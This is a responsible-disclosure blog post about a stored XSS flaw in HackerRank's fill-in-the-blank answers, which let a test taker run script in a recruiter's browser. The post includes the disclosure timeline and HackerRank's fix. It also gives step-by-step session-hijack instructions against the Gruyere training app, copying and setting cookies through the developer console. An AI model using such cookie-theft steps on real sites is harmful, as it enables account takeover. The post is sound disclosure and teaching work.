Ethical Vulnerability Disclosure - HackerRank
Veer Dedhia is an instructor at Fullstack Academy's Cyber Bootcamp in NYC.
Over 10 days in October 2019, the Fullstack Cyber Bootcamp team found a stored XSS vulnerability in HackerRank that would allow a test-taker to exploit a test administrator. The vulnerability was disclosed to HackerRank support, and very promptly fixed (props to the HackerRank engineering team).
HackerRank is a platform to create assessments, primarily for hiring programmers. It’s widely used by companies as a standard way to compare candidates. Worth noting are that the test administrators are from the company (maybe recruiters or HR), who are customers of HackerRank. Test takers are the candidates, who are outside and untrusted actors.
Cross-Site Scripting is a type of client-side web attack, where attacker-controlled code executes in the context of the victim’s browser. This type of vulnerability is consistently in the OWASP Top Ten list of web security issues.
For example, you can use my cookies from my cheesy blog (see below) to log into my account without knowing my password. Here's how:
- Navigate to Gruyere. Click “Agree and Start” to launch the vulnerable application. Copy the URL and send it to a friend. It will look like:
- “Sign up” for a user account with a dummy password.
- Open the Developer Tools in your browser.
console.log(document.cookie);. You should see something like:
"GRUYERE=84673500|fullstack||author;"(it’s ok if there is more).
document.cookie = "PUT_COOKIES_HERE".
- Refresh the page, and check the username.
Stored XSS is a form of cross-site scripting, where the attacker’s code is sent to the web server first, and waits there for the victim to trigger it. Upon navigating to the vulnerable webpage, the victim’s browser runs the attacker’s code, as if that code came from the website itself. Again, the code has access to cookies and other data.
We found a stored XSS vulnerability in HackerRank, where a malicious test taker (job applicant) could send code to the server. That attacker code would later be viewed by the test administrator (recruiter), and the browser would execute the attacker’s code. Here’s a video where we demonstrate the full attack chain.
- We start as the Test Administrator, creating a new test for our job posting.
- We then invite a Job Applicant to take the test.
- Later, when the Test Administrator sees the completed test, the code executes!
This vulnerability affected “Fill-in-the-Blank” style questions in HackerRank. Sanitization of the user inputted answers was inconsistent with other question types, which allowed the attacker to inject arbitrary HTML (including <script> tags). The HTML would render when the test administrator viewed the detailed answers, which would be routine when evaluating test results.
HackerRank quickly acknowledged and patched this vulnerability, encoding the user input such that it would render as plain-text for the test administrator. We were able to independently confirm this patch using the same demonstration as above.
- Attack requirements: any test with a “Fill in the Blank” question. Administrator sends the test invitation to the attacker.
- Administrator views the “Detailed” answers submitted by the attacker.
- 2019-10-20: Vulnerability discovered in HackerRank site.
- 2019-10-22: First disclosure to HackerRank via support form.
- 2019-10-23 - 2019-10-24: Attack details and demo video sent to the support and engineering teams at HackerRank.
- 2019-10-25: Acknowledgement of vulnerability from the CTO & Co-founder, Harishankaran.
- 2019-10-30: HackerRank fixes this vulnerability and gives permission to publish.